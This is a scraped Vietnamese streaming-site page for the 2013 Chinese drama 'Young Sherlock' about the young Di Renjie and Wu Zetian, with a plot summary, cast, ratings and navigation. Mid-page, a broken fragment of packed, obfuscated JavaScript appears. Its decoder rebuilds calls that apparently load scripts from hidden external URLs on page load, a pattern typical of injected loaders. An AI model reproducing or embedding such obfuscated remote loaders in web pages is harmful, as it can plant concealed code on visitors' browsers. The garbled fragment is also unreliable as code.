Banner C1
Banner C1

Phim

Thiếu Niên Thần Thám Địch Nhân Kiệt - Young Sherlock

Xem Phim Thiếu Niên Thần Thám Địch Nhân Kiệt
168829 lượt xem

39/39 Phim Tình CảmPhim Dã Sữ Phim Trung Quốc

Đạo Diễn: Lâm Phong

Thời lượng: 39 Tập

Năm phát hành: 2013

Xem phimXem TrailerTải Phim

4.1
179 Star | 44 Rates
  • Các Diễn Viên Trong Phim
  • Nội Dung Phim

Phim Thiếu Niên Thần Thám Địch Nhân Kiệt: Xoay quanh vị quan tên Địch Nhân Kiệt và vị nữ hoàng đế Võ Tắc Thiên. Nhưng trong phim Thiếu Niên Thần Thám Địch Nhân Kiệt thì chúng ta sẽ tìm hiểu cuộc đời của họ khi còn trẻ, mở đầu bằng việc Địch Nhân Kiệt tham gia thi cử. Khi đó, Nhân Kiệt phát hiện có thích khách làm náo loạn cả phòng thi và anh bắt được từ đó được phong làm phán tá vì có công cứu giá.
Thiếu Niên Thần Thám Địch Nhân Kiệt
Cũng từ đó, anh bắt đầu tham gia phá án và vụ án kế tiếp là cái chết đột ngột của phu quân của người tình đầu Sở Vân của anh. ai cũng nghĩ cái chết đó là ngẫu nhiên ngoài ý muốn ngay trong đêm tâm hôn nhưng Địch Nhân Kiệt lại không nghĩ vậy. Phim Thiếu Niên Thần Thám Địch Nhân Kiệt còn nói đến lòng trung thành và sự gắn kết của Địch Nhân Kiệt đối với hoàng đế Võ Tắc Thiên. Trong phim này hai vai chính là Địch Nhân Kiệt và Võ Tắc Thiên lần lượt sẽ do Huỳnh Tông Trạch và Lâm Tâm Như thể hiện.

Xem phim '\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$.0(\'2://8.3.1/5/6/7/g.9\');$.0(\'2://b.c.1/a/d.e?f=4\')',17,17,'
  • Trailer Phim
8.2
44
  • Phim Cùng Thể Loại

BÌNH LUẬN PHIM : Thiếu Niên Thần Thám Địch Nhân Kiệt

Banner C1

User Online
Banner C1
Banner C1
loading...